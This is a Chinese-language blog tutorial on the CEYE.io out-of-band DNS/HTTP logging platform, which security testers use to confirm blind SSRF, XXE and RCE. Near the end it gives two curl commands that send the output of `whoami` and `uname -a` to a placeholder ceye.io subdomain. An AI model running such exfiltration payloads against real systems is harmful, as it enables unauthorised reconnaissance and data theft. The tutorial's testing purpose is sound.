当前位置:   article > 正文

CEYE平台使用简介_ceye.io

ceye.io

CEYE简介

CEYE是一个用于检测带外数据(Out-of-Band)的监控平台,例如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息(例如SSRF/ XXE/ RCE等)。

CEYE的使用场景

CEYE的诞生也是因为它的使用场景而孕育而生的,一般有两种常见的情况会导致许多漏洞扫描工具漏扫:

  • 漏洞检测或漏洞利用需要进一步的用户或系统交互。
  • 一些漏洞类型没有直接表明攻击是成功的。如Payload触发了却不在前端页面显示。

为了解决这个问题,CEYE至此诞生。CEYE平台通过使用诸如DNS和HTTP之类的带外信道,便可以得到回显信息。

基本使用

注册与登录

CEYE网址:http://ceye.io/

如果你已经有账号了,那么直接登录即可,如果没有则注册一个就OK~

获得自己的域名标识符

在用户注册之后CEYE会为每一个注册用户提供一个具有唯一性的6位数的域名标识符identifier,你可以在你的个人页面中看到:

例如我们的域名标志符为abcdef.ceye.io,那么所有来自于abcdef.ceye.io或者*.abcdef.ceye.io的DNS查询和http的请求都会被记录下来,而通过查看这些记录下来的信息,安全研究人员可以确定并改进自己的漏洞研究方案。

简易测试

通过DNS带外信道检测Bind Payload的执行情况:

DNS查询可以以多种不同的方式进行解析。CEYE.IO平台提供了一台DNS Server来解析域名。它的 nameserver address 被设置为自己的服务器IP,因此所有关于ceye.io 的域名的DNS查询最终都会被发送到CEYE的DNS服务器。

例如,在终端中使用 nslookup:

之后再CEYE平台中会有记录:

趣味使用

CEYE.IO平台拥有自己的HTTP服务器,记录用户域名的所有请求。这可以用来做一些有趣的事情:

A、命令执行

Linux:

curl -X POST http://ip.port.xxxxxx.ceye.io/`whoami`

之后再CEYE平台上会外带处whoami的执行结果:

再如:

curl http://ip.port.xxxxxx.ceye.io/`uname -a`

之后可以查看内核版本:

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/822811
推荐阅读
相关标签
  

闽ICP备14008679号